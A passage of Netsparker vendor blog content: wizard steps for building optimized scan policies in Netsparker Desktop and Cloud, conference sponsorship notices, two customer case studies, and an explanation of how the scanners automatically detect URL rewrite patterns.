Tick the operating system on which the target web application is running on.

3. Select Web Server Software

Tick the web server software the target web application is running on.

Note: If the target web application is running on a web server software that is not listed here Netsparker can still scan it. If a web server software is not listed it just means that there are no specific security checks for it and you can untick all web servers.

4. Select Application Server / Web Technology

Tick the application server the target web application is built on. If it is built using multiple application servers, tick all that apply.

Note: If the target web application is built with a web technology that is not listed here, Netsparker can still scan it. If a web technology is not listed it just means that there are no specific security checks for it and you can untick all application servers.

5. Select Database Server

Tick the database server the target web application is using. If multiple database servers are being used tick all that apply.

Note: If the target web application is using a database server that is not listed here, Netsparker can still scan it. If a database server is not listed it just means that there are no specific security checks for it and you can untick all application servers.

6. Configure Netsparker Resource Finder

In this step you can limit or disable the Resource Finder, which is a module that is used to guess not linked or hidden directories and other type of resources, such as old backup files. To disable the Resource Finder simply untick the option Enable Resource Finder. Alternatively you can limit the number of resources to look for in every folder from the Limit input field.

7. Configure Known Web Application Fingerprinting

Netsparker web application security scanners have a known web application fingerprinting module that is used to identify off the shelf web applications such as WordPress and Drupal. If it detects such a web application it will launch a number of specific security checks. If the target web application you are scanning does not have any such web applications installed you can safely disable the option Enable Web App Fingerprint.

8. Review the New Optimized Scan Policy

In the last step you can review all of the configured options. Should you need to make further changes use the Back button to navigate back to that option. Once ready name the scan policy and click Finish to save and use the scan policy during a web application security scan.

How to Optimize Scan Policies in Netsparker Cloud

1. Launch the Scan Policy Optimizer Wizard

You can launch the Scan Policy Optimizer wizard in Netsparker Cloud from two different locations; from the Optimized Policies mode in the Policies left hand side bar menu or by clicking the New Optimized Scan Policy  button in the Scan Policies page as shown in the screenshot below.

2. Select Operating System

Tick the operating system on which the target web application is running on.

3. Select Web Server Software

Tick the web server software the target web application is running on.

Note: If the target web application is running on a web server software that is not listed here Netsparker can still scan it. If a web server software is not listed it just means that there are no specific security checks for it and you can untick all web servers.

4. Select Application Server / Web Technology

Tick the application server the target web application is built on. If it is built using multiple application servers, tick all that apply.

Note: If the target web application is built with a web technology that is not listed here, Netsparker can still scan it. If a web technology is not listed it just means that there are no specific security checks for it and you can untick all application servers.

5. Select Database Server

Tick the database server the target web application is using. If multiple database servers are being used tick all that apply.

Note: If the target web application is using a database server that is not listed here, Netsparker can still scan it. If a database server is not listed it just means that there are no specific security checks for it and you can untick all application servers.

6. Configure Netsparker Resource Finder

In this step you can limit or disable the Resource Finder, which is a module that is used to guess not linked or hidden directories and other type of resources, such as old backup files. To disable the Resource Finder simply untick the option Enable Resource Finder. Alternatively you can limit the number of resources to look for in every folder from the Limit input field.

7. Configure Known Web Application Fingerprinting

Netsparker web application security scanners have a known web application fingerprinting module that is used to identify off the shelf web applications such as WordPress and Drupal. If it detects such a web application it will launch a number of specific security checks. If the target web application you are scanning does not have any such web applications installed you can safely disable the option Enable Web App Fingerprint.

8. Review the New Optimized Scan Policy

In the last step you can review all of the configured options. Should you need to make further changes use the Back button to navigate back to that option. Once ready name the scan policy and click Finish to save and use the scan policy during an online web application security scan.

Netsparker will be sponsoring and exhibiting Netsparker Desktop and Netsparker Cloud web application security scanners at the JampaSec conference in Brazil.

Netsparker Cloud is Netsparker's newest product. It is a false positive free online web application security scanner and is specifically designed to help enterprises automated most of the pre and post web security scans tasks to ensure the long term security of their websites and web applications.

JampaSec 2015 is an Information Security Conference that will happen between October 2nd and 3rd in João Pessoa, Paraíba. The conference will have speakers from all over Brazil and will cover trending topics in Information Security. Focused on Security Professionals, System Admins, IT Managers and students as well, the conference is organized by Katana Security and sponsored by Netsparker and OWASP. It also has the support from the OWASP Paraíba Chapter and Faculdade Estácio. For more information visit the JampaSec 2015 official website.

How Do You Ensure the Security of Your Websites and Web Applications?

We would like to help you keep your websites and web applications secure so head over to our booth and speak to us. We would be more than happy to have a chat with you or answer any questions you might have. Feel free to stop by, even just to say hello.

Netsparker is sponsoring and exhibiting at the Hacktrick conference in Turkey. The conference will be held between the 6th and 8th of September at the Sabanci University in Istanbul. The three day conference will include a number of seminars, courses, trainings, and CTF contests.

Visit the Netsparker Booth - See How Netsparker Web Security Scanners Can Help Your Business

If you will be at the Hacktrick conference come and speak to us to see how Netsparker web application security scanning solutions can help you ensure the long term security of all your websites and web applications. We would be more than happy to answer any questions you might have and show you how easy it is to find vulnerabilities with Netsparker Desktop& Netsparker Cloud. We can also get you started with a full trial to see how many vulnerabilities and security flaws the Netsparker web application security scanners can identify on your websites.

So don’t forget to visit the Netsparker booth while at Hacktrick conference, even just to say hello. We look forward to meeting you there. For more information on the conference visit the Hacktrick conference website.

"Netsparker has meant deployment of new and updated code can be put into production more easily and with greater confidence as to its robustness" Dr Paul Bevan Head of Core Software Services at Wellcome Trust Sanger Institute

The Wellcome Trust Sanger Institute is a charitably funded genomic research centre and a leader in the Human Genome Project. They have been using Netsparker web application security scanner to scan web applications and identify vulnerabilities in them for over three years.

Due to the nature of their research, which is focused on understanding the role of genetics in health and disease that have an impact on health globally, the Sanger Institute aims to provide results that can be translated into diagnostics, or treatments & therapies that reduce global health burdens.

Web applications enabled Wellcome Trust Sanger Institute to deliver the results of their research to researchers and pharmaceutical companies more easily and efficiently. Though web applications are also susceptible to malicious hack attacks should they be vulnerable, hence the institute needed to ensure the security of their web applications and the integrity of their data.

The evolution from Manual testing to using an Automated Web Application Security Scanner

Prior to using Netsparker web application security scanner, the Sanger Institute did not use any other web security products. They would manually test their web applications for the most common vulnerabilities and flaws, though mainly focusing on the two most common vulnerabilities; cross-site scripting and sql injection vulnerabilities. There are many other web application vulnerabilities one should check for though manual security testing took a considerable amount of time, money and resources hence it was limited.

Therefore Wellcome Trust Sanger Institute required a new, ideally automated solution that could replace their current manual web security testing procedures. They were looking for a new automated solution that could help them automatically find vulnerabilities and security flaws in their web applications without having to spend too much time, money and resources.

Why Wellcome Trust Sanger Institute Chose Netsparker?

The decision by the Wellcome Trust Sanger Institute to use Netsparker was based on their requirements for a product that could manage a broad spectrum of web security scanning & tests. They also required a web vulnerability scanner that was easy to use and could identify the majority of web vulnerabilities so that they can be patched ahead of time, thus mitigating the risk of being hacked.

The Wellcome Trust Sanger Institute use Netsparker's web application security scanner to scan multiple websites and web applications updates prior to releasing them in live environments. The 20+ websites that the Sanger Institute owns, are built using a variety of web frameworks such as Java, Perl, Ruby and PHP and run on Apache and Tomcat web servers.

“We have been scanning our web application updates prior to implementing them in our live environment for quite a while and would recommend everyone to do so,” said Dr Bevan. “You’d be quite surprised how many vulnerabilities can be found during such stages of development”. Netsparker found several XSS and SQL Injections vulnerabilities during these regular scans. Should such vulnerabilities have made it to the live deployment they could have been easily found and exploited during an attack.

Protecting valuable data and Reputation

When asked by Netsparker as to what kind of damage they would endure if they had been hacked, the head of Core Software services at the Wellcome Trust Sanger Institute said "It would be mainly reputational damage since most of the software and data produced by the Sanger Institute is made freely available to researchers and pharmaceutical companies. Other forms of damage would be tampered data and the time & manpower spent understanding how we had been hacked, and reinstalling software on clean, rebuilt, hosts."

More about the Wellcome Trust Sanger Institute

The Wellcome Trust Sanger Institute is a charitably funded genomic research centre located in Hinxton, nine miles south of Cambridge in the UK.

A leader in the Human Genome Project, we are now focused on understanding the role of genetics in health and disease. Our passion for discovery drives our quest to uncover the basis of genetic and infectious disease. We aim to provide results that can be translated into diagnostics, treatments or therapies that reduce global health burdens.

About Netsparker

Netsparker Ltd is a young and enthusiastic UK based company focused on developing automated web security products, mainly the false positive web application security scanners Netsparker Desktop and Netsparker Cloud. Netsparker management and engineers have more than two decades of experience in the web application security industry that is reflected in their products. Founded in 2009, Netsparker’s automated web vulnerability scanners are the leading security tools and are used by world renowned companies such as Samsung, NASA, Microsoft, ING bank, Skype and Ernst & Young.

To scan multiple websites and web applications at the same time with Netsparker Desktop simply start multiple instances of Netsparker Desktop. Therefore if you are already have an instance of Netsparker Desktop scanning a website, and would like to scan another 3 websites launch three new instances of Netsparker Desktop from the Windows Start menu.

Concurrent Scans and Instances Are Not Limited

Netsparker does not limit the number of simultaneous web application security scans or concurrent instances you can run of Netsparker Desktop. The maximum number of simultaneous scans is only limited by your hardware resources.

Each running instance of Netsparker Desktop will consume resources during a web security scan. Therefore before running another instance of the web vulnerability scanner make sure you have enough free resources to run it.

Too Many Websites to Scan?

If you have too many websites to scan we recommend you to try Netsparker Cloud. Our scalable online web application security scanner is specifically tailored to help organizations scan, automate post security scan tasks and ensure the long term security of hundreds and thousands of web applications.

"The decision to use Netsparker for website and web application vulnerability scanning was due to the large library of scan settings available to choose from. This choice of scans produced easy to understand definitions of the threats that were found. Netsparker also provided solutions to the identified threats”. Steve Charlton, T4G’s Quality Assurance Specialist.

T4G is an IT consulting firm that has expertise in analytics, managed services, retail planning and digital marketing. T4G also designs, develops and deploys technology solutions for its customers to help run their businesses and has been a using Netsparker web application security scanner since early 2014.

Automatically Finding Vulnerabilities in Their Custom Web Applications

T4G started using Netsparker to automatically find vulnerabilities and security flaws on their own websites and custom web applications. It all worked very well for them; Netsparker helped uncover some vulnerabilities during the early stages of development, before an update or a web application is used in a live environment.

Scanning Customer’s Web Applications with Netsparker Web Security Scanner

Like any other business, T4G wants to deliver the best service to their customers. Considering Netsparker has worked well for them, they introduced automated web application security scanning with Netsparker in their Harmonized Threat and Risk Assessment audit with which T4G helps its customers ensure the long-term security of their websites and web applications. They use Netsparker web application security scanner to scan their customer’s websites and web applications.

“We didn’t think twice about including Netsparker security scans in our audit services, it was simply the best option for our clients. In short, Netsparker provides value to a security oriented client” Steve Charlton, T4G’s QA Specialist.

Scanning A Wide Variety of Web Applications and Web Technologies

T4G has customers from a number of different industry verticals such as retail, hospitality, energy, finance and also government agencies. Even though the majority of the websites they scan are built on Java and run on Apache, with such a varied customer base T4G scans any type of web application and web technology. Their engineers has seen it all.

Identifying Vulnerabilities in Web Applications Before Deployment

Automated web security and vulnerability scanning have evolved in the last few years. Nowadays it is not just about scanning a web application before it is deployed in a live environment, but one has to ensure security is thought for, and the code is secure even during the early stages of development. If security is not thought for during the early stages of development, it might be too expensive or sometimes even impossible to fix a security flaw at a later stage.

Following the best security practices, T4G are a proof that automated scans are indeed needed at different and early stages of development. In fact it is not the first time that Netsparker identified significant vulnerabilities during a routine web security scan of web applications which are still being developed.

About T4G

T4G brings together expertise in Analytics, Managed Services, Retail Planning, Digital Marketing and Custom Applications. T4G designs, develops and deploys technology solutions that help customers run their businesses better.

T4G's self-directed project teams enables people to create, solve and lead using a unique mix of technology, design and analytics to bring value to customers.

About Netsparker Web Application Security Scanner

Netsparker Web Application Security Scanner is an industry leading automated web application security scanner developed by Netsparker Ltd. Netsparker management and engineers have more than a decade of experience in the web application security industry that is reflected in their product. Netsparker is a very easy to use web application security scanner that automates most of the web application security scanning. An out of the box installation of Netsparker is able to scan a wide variety of web applications, therefore web security experts, penetration testers and QA engineers do not need to spend countless amount of hours tweaking and configuring the software. Netsparker is revolutionising web application security by being the only web application security scanner to automatically verify detected web vulnerabilities, thus reporting no false positives. Netsparker is used by world renowned companies such as Samsung, NASA, Skype, ING, ISACA and Ernst & Young.

URL rewriting in web applications is one big headache for both automated web security scanners and their users. If you scan a website that uses URL rewrite technology and do not configure URL rewrite rules in your scanner, the parameters in URLs won’t be scanned. And if such parameters are vulnerable the scanner won’t report such vulnerabilities, leaving them open to potential exploitation.

Failing to configure URL rewrite rules in scanners also mean that the web security scan might take forever to finish. Some scanners will even report false positives and go haywire if you don’t configure URL rewrite rules, yet many users still do not configure them. So we automated the whole process of configuring URL rewrite rules in web security scanners.

This blog post gives an insight of how this new automated technology, which will be introduced in the upcoming versions of both Netsparker Desktop and Netsparker Cloud will work. It also explains why we automated the process of configuring URL rewrite rules in our web application security scanners.

Addressing the Problem of Configuring URL Rewrite Rules in Automated Web Security Scanners

Many users fail to configure URL rewrite rules in their automated security scanners because in most software, they are very difficult to configure. Most of the time you need to have access to the web server’s configuration files, and need to know how to write regular expressions. As always, we wanted to automate as much of this process as possible, so users can scan all of the websites’ parameters without getting bogged down into configuring their web security scanner.

Manually Configuring URL Rewrite Rules in Netsparker Is Easy

To configure URL rewrite rules in both Netsparker Desktop and Netsparker Cloud you do not need to have any information on how the web server is configured, and you do not need to know how to write regular expressions. All you need to do is use the URL rewrite rules wizard to specify the parameter name and type, the rest is all automated.

Even with such wizard in place many users still do not configure URL rewrite rules. Most users just want to launch a web security scan and get a report with all the vulnerabilities to fix. Only the very few really go into the detail of configuring several different aspects of the web security scan. So as per our usual, we thought of automating the process of configuring URL rewrite rules while still allowing the old school geeks to configure their own rules.

Limitations of the Existing URL Rewrite Rules Configuration

To understand how this new technology works, first you have to understand the limitations of the existing solution. At the moment Netsparker users can select one of the below options when scanning a web application which has URL rewrite enabled:

Use Heuristic URL Rewrite Support

When this option is selected the scanner tries to automatically determine if URL rewrite technology is being used on the target website, so if it is the scan is limited. Therefore if during a scan the scanner detects the below directory structure it will stop after a number of tries to avoid going into a loop:

http://www.example.com/users/1

http://www.example.com/users/2

http://www.example.com/users/3

…

This solution has a number of limitations. First of all, the scanners will not scan the parameters in URLs and it only recognizes numeric parameters, such as the ones in the example above.

Use Custom URL Rewrite Rules

When this option is enabled you have to configure URL rewrite rules in Netsparker scanners so the scanner can scan all the parameters in the URLs. The problem with this solution is that even though when compared to the configuration of other scanners it is a very easy solution, users still need to have some basic knowledge of the link structure of the target website, hence manual configuration is involved. And as you might have noticed by now, manual configuration is in Netsparker’s bad books.

Automatic Detection and Configuration of URL Rewrite Rule of Target Websites and Web Applications

To automate the configuration of URL rewrite rules we improved the Heuristic URL Rewrite engine. Therefore if you want to scan a website or web application which has URL rewrite enabled you can either configure the URL rewrite rules manually or select the option Use Heuristic URL Rewrite Support.

Screenshot: Heuristic URL Rewrite Rules configuration in Netsparker Desktop

Screenshot: Heuristic URL Rewrite Rules configuration in Netsparker Cloud

By default, when Netsparker Desktop or Netsparker Cloud crawl more than 60 URLs that have the same pattern, they will automatically create a custom URL Rewrite rule and scan the parameters in the URLs. Below is a list of different types of parameters which Netsparker can automatically identify;

String Parameters
Example URL: http://www.example.com/user/robert
Pattern: /user/{param1}

Numeric Parameters
Example URL: http://www.example.com/userid/1
Pattern: /userid/{param1}

Parameters with Prefixes
Example URL: http://www.example.com/users/user_robert/
Pattern: /users/user_{param1}

Parameters with Suffixes
Example URL: http://www.example.com/users/robert_user/
Pattern: /users/{param1}_user

Multiple Parameters in Same URL
Example URL: http://www.example.com/users/123/robert/
Pattern: /users/{param1}/{param2}

Slug Based Parameters
Example URL: http://www.example.com/blog/pci-dss-good-bad-insecure/
Pattern: /blog/{param1}

Fine Tuning the Automatic Detection and Configuration of URL Rewrite Rules

As seen in the above screenshots the Netsparker scanners have four new settings in the Heuristic URL Rewrite Support configuration. These settings can be used to fine tune the automated detection and configuration of URL rewrite rules and below is an explanation of what each of the setting is used for.

Note: The default settings work well in most of the cases and should only be changed should you notice any performance issues.

Maximum Dynamic Signatures

Use this option to specify how many URLs Netsparker should crawl before it determines that URL rewrite rules are needed to scan the target website. The scanners determine if URL rewrite rules are needed or not by analyzing the patterns of the crawled URLs.

If there are more than 60 URLs (default value) that have a similar pattern, for example http://www.example.com/category/[x] then the scanners will automatically create the neccessary URL rewrite rules to crawl the website and scan the parameters in the URLs.

Block Analyze Threshold

Use this option to specify the number of URLs Netsparker should crawl before checking if any of the crawled URLs have a matching pattern. Therefore if the configured value is 20 (default), each time Netsparker crawls 20 URLs it will check if there are 60 (configured in the option Maximum Dynamic Signatures) of the crawled URLs that have a matching pattern.

The process of checking if URL rewrite rules are needed is very expensive in terms of resources, hence why it is only done every so often.

Block Merge Threshold

Use this setting to specify the number of URLs that have a matching pattern but different parameters in the URL that Netsparker should crawl before merging them together. For example Netsparker crawls the following URLs:

/category1/page1 -> /category1/page30

/cateogry2/page31 -> /category2/page60

In such case the Netsparker URL rewrite analysis engine splits each of the the crawled URLs in the following 4 blocks:

Since there are 60 pages which have a matching URL pattern (page1 -> page60), but they have a different parameter name in the URL (category1 and category2) Netsparker merges the two blocks of URLs and creates a URL rewrite rule for these pages, such as /category1/{param1}.

This also applies to the category parameter. Therefore if Netsparker crawls more than 60 different category URLs, for example /category1/... -> /category60/... it will also merge those blocks of URLs and create a URL rewrite rule for them, such as /param1/param2/.

Block Separators

Use this option to specify the characters used on the target website to separate the blocks in a URL. The default list has the following characters: / _ $ . , ; | :

Therefore when using the default list, the scanner will split a crawled URL such as http://www.example.com/user/robert_abela in 6 blocks, as highlighted in the below screenshot.

Reporting the Detected URL Rewrites on Target Website

Once Netsparker Desktop or Netsparker Cloud automatically detect and configure URL rewrite rules for a target website they will report it in a new node URL Rewrite in the Knowledge Base node, as seen in the below screenshots.

Automatically configured URL rewrite rules are reported in the Knowledge Base node in Netsparker Desktop

Automatically configured URL rewrite rules are reported in the Knowledge Base node in Netsparker Cloud